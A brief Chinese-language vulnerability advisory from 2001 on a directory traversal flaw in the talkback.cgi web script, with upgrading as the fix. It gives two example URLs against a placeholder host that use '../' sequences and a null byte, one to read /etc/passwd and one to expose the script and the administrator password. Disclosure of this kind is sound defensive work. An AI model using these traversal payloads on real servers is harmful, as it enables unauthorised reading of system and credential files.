talkback.cgi存在任意用户可读文件漏洞发布时间:2001-04-10 更新时间:2001-04-10 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 talkback.cgi(http://www.waytotheweb.com )详细描述 talkback.cgi(http://www.waytotheweb.com )存在任意文件可被 查看漏洞,远程用户可以通过: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../../../../../../../../etc/passwd%00&action=view&matchview=1 其中下面的URL可以获得管理员密码: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../cgi-bin/talkback.cgi%00&action=view&matchview=1 测试代码 见描述部分。 解决方案 新版本的talkback.cgi不存在此漏洞 http://www.waytotheweb.com/webscripts/talkback.htm 相关信息 |
